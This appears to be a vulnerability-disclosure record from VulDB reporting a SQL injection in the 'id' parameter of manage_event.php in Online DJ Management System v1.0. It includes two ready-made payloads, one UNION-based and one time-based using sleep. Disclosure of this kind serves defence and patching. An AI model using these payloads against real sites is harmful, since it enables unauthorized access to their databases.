| Title | Online DJ Management System v1.0 /odjms/admin/events/manage_event.php GET parameter id exists SQL injection vulnerability |
|---|
| Description | An issue was discovered in Online DJ Management System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /odjms/admin/events/manage_event.php?id.
Payload1:id=-1' union all select null,null,concat(0x414243,0x7576777879),null,null,null,null-- -
Payload2:id=1' and (select 1 from (select(sleep(15)))l) and 'v'='v |
|---|
| Source | ⚠️ https://github.com/aieouZZ/bug_report/blob/main/SQLi-1.md |
|---|
| User | LiZhang (UID 45734) |
|---|
| Submission | 04/26/2023 11:22 (3 years ago) |
|---|
| Moderation | 04/28/2023 13:19 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 227646 [SourceCodester Online DJ Management System 1.0 GET Parameter manage_event.php ID sql injection] |
|---|
| Points | 19 |
|---|